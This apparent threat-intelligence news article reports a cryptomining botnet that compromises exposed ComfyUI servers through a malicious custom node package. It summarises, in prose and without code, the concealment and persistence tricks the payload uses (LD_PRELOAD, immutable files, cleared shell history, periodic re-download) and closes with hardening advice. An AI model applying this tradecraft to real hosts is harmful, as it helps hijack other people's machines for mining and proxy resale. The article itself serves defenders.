Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign

The rapid adoption of generative‑AI platforms has created a new attack surface: exposed AI service instances that lack proper authentication. ComfyUI, a widely used front‑end for Stable Diffusion, allows custom Python nodes, which attackers weaponize to execute arbitrary code. By continuously probing major cloud ranges, the campaign can locate vulnerable deployments in minutes, install a malicious node package, and pivot to a full‑blown cryptomining operation. This approach mirrors earlier botnet trends that repurpose misconfigured services for profit, but the focus on AI tools marks a shift toward higher‑value targets.

Technical analysis shows the threat actor leverages a custom "ComfyUI‑Shell‑Executor" package to fetch a persistent shell script (ghost.sh). The script disables shell history, kills competing miners, and employs LD_PRELOAD alongside chattr +i to conceal and protect the mining binaries, even from root. Persistence is reinforced by re‑executing the exploit each time ComfyUI starts and by downloading the payload every six hours. Beyond mining, the compromised hosts are enrolled in a Flask‑based command‑and‑control panel that can deploy Hysteria V2 proxies, turning the machines into sellable bandwidth assets for other malicious actors.

The broader implication for enterprises is clear: any publicly reachable AI service must be treated as a critical asset. Organizations should enforce strict network segmentation, disable unauthenticated custom node execution, and implement continuous vulnerability scanning for AI workloads. Cloud providers can aid by offering default authentication for UI endpoints and by flagging anomalous traffic patterns associated with botnet scanners. As botnet activity climbs—up 26% in early 2025—proactive hardening of AI infrastructure will be essential to curb the monetization of cryptomining and proxy services.